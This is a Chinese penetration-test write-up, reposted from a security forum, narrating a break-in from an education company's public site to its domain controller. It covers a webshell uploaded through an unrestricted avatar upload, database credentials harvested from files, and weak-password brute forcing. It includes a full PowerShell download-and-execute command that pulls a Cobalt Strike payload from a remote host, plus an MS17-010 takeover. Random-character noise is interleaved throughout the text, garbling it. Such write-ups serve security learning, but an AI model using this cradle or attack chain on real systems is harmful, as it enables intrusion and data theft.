) }+ l$ H- k+ S: `( R
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
. C! W% Y" y9 \' } ; C! q2 A( X3 h0 k' S6 C; z7 g
1 F+ o: b" `& k' x! @ _# _5 f+ P* W
' W$ H( b) H, P" k: \ % B2 X' c7 a7 l. X
2 Y L% ]1 N1 t, A9 q0 ?9 e
正文
$ c" S& ~* ^- S- J/ @ T
3 m4 C/ `# x' {0 i3 z. H/ E* q
# A; S6 t: `6 |1 h* \$ ?+ z' A ; g; N% c' t* F4 d
2 }7 X' Z$ r( O
8 r/ i8 c) B$ z, D2 |- Z$ f" ~ 目标:www.xxxx.com(一家教育机构) & B. `, P7 v) x2 P+ Z" M
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能; s4 t! v* C* `6 c+ K6 A# v
0 x$ K; m4 C5 C6 |; D% x- a
4 f) X! n( B. p/ e* H% |# O
' B, ], c: T( S5 D $ x3 ~2 K; t: Y4 C, O
: ~8 \- ^, v# i# t3 W5 T
进行了简单的信息搜集 : P/ J5 U; v- q
& R/ x. X6 E+ ?; L- |
A8 i7 G; r$ D1 S& [2 ]: P, ?
. a; p: q: [3 y1 n
2 |: W: m% L: ?8 j9 p 子域名搜集: x7 k) f: G0 u* J, v& J4 h7 A
2 ^1 @& t5 ~7 Z
5 n: F+ a+ E' A. {/ i) F |
e7 p; ]5 y1 } $ d+ C% N6 M/ t* @+ s' [- ~
) c% T p: E" C
fofa找资产 ! ^7 I2 z: o% S- a* [
5 X, R+ Z! @3 |2 u5 `7 t0 R# v
% y/ m3 O' {8 t & O' O. `: b* Y$ F( P) d
0 \- Z1 c% `1 Y/ r; o5 T, F$ C3 O
8 @4 O7 F6 |- V6 J 3 S' E4 j" ?; Q+ D; `2 Z' x' p$ b
* w. F7 N) }. z) A0 W9 L: z
一共七个资产。去重之后只有两个。
+ n5 \" F3 G3 n- Y4 j1 _7 i5 V
5 H: k; j+ {9 B( a' w/ L2 C. O8 Z. |! n- C" D1 e( T
2 ]0 g& z0 b3 R; I9 G2 c
1 M0 B) b$ k/ W! C 目录探测
1 ~4 Y' z* b g" m$ _& N" g8 O
) ^: s& J# v' F; D, c1 W5 P2 ~/ ?1 S0 o1 O& H
5 h$ L. V6 |5 A* y7 r8 y$ \
' _1 X" y" @) ^+ T7 Z* a( C& S( L9 d) q/ |2 J, `* A' V5 a% C/ |7 l
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& |. Y0 S& f& t; s$ g
7 N- v7 ^5 ^7 K/ c, ? ]. z
/ n* z8 Y) O" y& l8 ~/ R: J5 Z5 x
; c9 b, m4 R5 p2 ^
3 D& J; ]3 M! A( e- Z( b 我又尝试了通过修改返回包来绕过登录界面
6 I9 u$ d1 Q1 O5 T* r2 H
$ K9 a, t4 s9 N, i+ F7 g. ?4 g1 B% _3 `; ]& C
7 n- _7 L1 [! L% K
( V2 ]% c! w. P: C; t( S( C, D3 ~0 x5 M& v- z v
还是不行,尝试注入无果
% d& t( y( F* F4 G 8 \5 h4 G$ y# i/ K) D, |
8 E& o+ j6 t. I) b1 I& g# Z
# o: x' t, i: N3 u
; i$ ~# N D3 p! ]( D/ m6 I
* Y+ V, R$ l# H7 b. y4 w 不过我目录探测出了一处Spring信息泄露
k% E/ g3 m% ^2 R& Q& f3 i
* O% L0 x' K3 G0 S' ~7 Z+ ^8 \7 E E! D5 b* @% [
" ]" r- C4 ?# \4 u* h' x- w5 o* g0 e& P8 A# K
4 D0 {% p7 m& y3 s( Y b. |
$ I' U, H9 ?% ?$ n$ P$ z0 l
7 ~# Y ~* H; z v' k 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录. x2 k7 I. @! a
: x+ k% e& t) L9 ~) m8 b/ B# g
* b. y' J6 B! n2 z, u v( j( t' F
) q( C5 Z9 w' Y : o3 y7 K) O( C% A9 q- |5 }' i2 f
! |1 Q' C4 n, s7 v: B) R: o8 d" ^
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
0 W% I. {4 F: b- I$ ? 6 ^& Q+ I: }: z/ f0 U6 e! r% O( i
, Q2 d4 a: h# M, A: q0 S6 a
+ k2 U4 a7 U8 H: L4 _# F8 }
0 m7 J7 o; U* O/ o
+ l. V1 ]5 P, Q2 ]- k! l) n 获取有些师傅到这一步就手机抓包电脑测了。9 J7 B3 F) h; | b( V
2 |, J/ H. T$ i- d4 G
( p9 ?* z! F4 Z7 E# d* U" e( D' X Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
4 ]9 d4 e3 }7 j& ^& H2 I
0 D0 x6 u3 I$ Q9 v
3 s0 n, y3 a6 H& S3 D 其中在一个公众号发现了小程序,可以进行注册。6 ~$ t& B( H( W! l) g/ V$ o
0 f- O4 j1 i9 j
/ G+ x0 l# H7 o4 M( e" h. f 看到了头像上传,尝试上传获取WebShell6 C5 c0 |* s9 B4 B% p
9 _2 ~4 J5 r W: B
0 U; T, U- y2 P! a, ]# X R! ^: g, q% G% U6 y6 Z( V# I
3 k* S7 V7 Q! f9 O6 i$ |3 i! s) a ]2 `
3 W9 Q3 X4 }" y- V$ `+ Q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( P6 ^) f8 J- `, `; w: G. r( i3 L6 b
( B* p2 a2 m. F8 M6 \2 I+ r2 h6 S8 i% g8 R, y1 i( I
* j8 v5 j" [% Y0 A" R4 V
- N2 y- B8 d f% s P1 n. O
) v8 }& `5 `- E I7 f/ V$ G 然后上了大马$ n6 Z- `7 Q3 R q% ~
, L; [4 n; u9 J( R
3 r1 z1 J7 T! E3 f' u , [1 _; ]$ s7 X: O% W1 W- g
# X7 A% r4 m, S5 J4 D7 {4 u9 f% W5 ~- }8 V' t
$ |/ w& x/ o8 @- M
: r6 \* I( k) I3 N( N( J! E) y
" @" v$ C9 s* R* W- C( F; S; j 通过翻找文件发现数据库账号密码6 ]$ |2 I( {2 ]7 N" R, z! g: M( W
, @# [7 h5 |: t& r) g
0 E2 K( _. e- N" Q1 r7 J4 p & ]' @! t. g3 k5 a2 W" p4 W1 _3 Z
& ]! ~, I& `5 M% g6 E/ Q8 f3 b6 w
' h; u: z9 s9 w/ w& V --内网渗透+ L1 g4 _6 P; U2 {* R; Y
# y& R# I7 x: d; z
. Z! p: {" `" y4 M0 k 直接通过powershell执行 cs上线
: ^0 @6 F5 B0 O/ e, ` # _0 I3 H- ^7 K
. z6 x8 K) M5 z9 c4 e& V3 x
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"* _5 C: e/ o. }. H4 I z
: E# N, z4 L7 D( f5 L
: }9 a2 }/ [/ l7 A
' f9 Y! E. E4 i; g
" a: t" i9 O. f) Z
~% U, Z3 { X+ ?3 Q
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
" b9 `9 ?3 K, d; h; m- F" e & [* \9 X9 C9 x& y" ^. F$ g
3 W$ p2 ] M( f( C; B# R+ T
+ K4 w& k! t( ~
& m# |7 b0 M% G* B4 J5 a4 o
& S! I* r3 t3 s1 o8 @ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 ( B/ l. g; D+ w# ]6 l
, J- B% z2 ^; l
" R5 o9 E1 n# r( n1 E @6 K$ w7 s, V1 j! |
( r" ?3 n% S) g: y7 d% X
' m0 X3 s: `9 }+ ?- @ : m; l$ ^! F7 S9 b, g4 s
% _ p& \+ }6 F6 X$ |/ i' t F+ A' w1 ?+ @
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
+ l" E& N8 d3 r7 B, D5 ? & s& E$ h: x5 q" g. G7 V
/ e- M6 z" g5 N# q$ A$ A
6 S" F* h4 w9 w n
% q. A) M0 L" v: O$ k$ F" t }- o
U5 |; W- [* O V7 T! l$ n0 B6 E3 ~
* ]) s& O! i4 |. t4 S- F1 _
% Q |1 ^, c1 y2 M 7 |) u2 z' g6 O7 ~6 V9 z
S7 Q9 `9 ?$ M& M/ h5 P2 I
2 I; g# m* ]3 v: K7 C2 V
$ \6 z& W: h6 Y: c9 S/ y
/ K8 g+ X& z+ Z! T [8 e4 { 4 A* r# y' j' K
, {9 t! L8 E: q/ p, F3 w/ H7 ~
' ?( l+ d' T; S9 I
小结
. V% P" c" y: _; J$ s% g n
6 z E G( P) V5 Q# |% \
9 H! \6 ]# E9 @ \ 0 e$ C( x2 Y6 R
7 N4 D. o4 z; A& B& g5 g" t
' r+ S( u6 l4 l 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!. w6 F+ B2 P6 i/ b% {4 I$ _3 Y* f
" q/ X+ ~/ r0 F
6 T! |& z& `/ H8 q) @# K
$ I* T0 j# c. S% S
; F0 W; W/ W5 W
; h, [& G$ {, C/ u3 n' d - 1 c# Y& a% w; U! L) s! Y
/ |" J. P0 {3 D W/ @6 [1 V
( k* v, G/ _/ u' P( [' P& H- f
-
k4 R* x' @1 _/ B( ]# K6 | ! I0 O" }1 }1 o
/ h- r, G9 I7 O# B) l0 t
F) V1 |, |- P8 N/ y
v8 N4 C' s$ T 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
L( |: ?* W+ J% C1 Q% E* Q6 e+ ?
" k4 }3 h( P$ M. U8 w
( v, c9 [; s+ n( N0 p ; {8 r0 O1 e3 y9 m9 Q! ^
|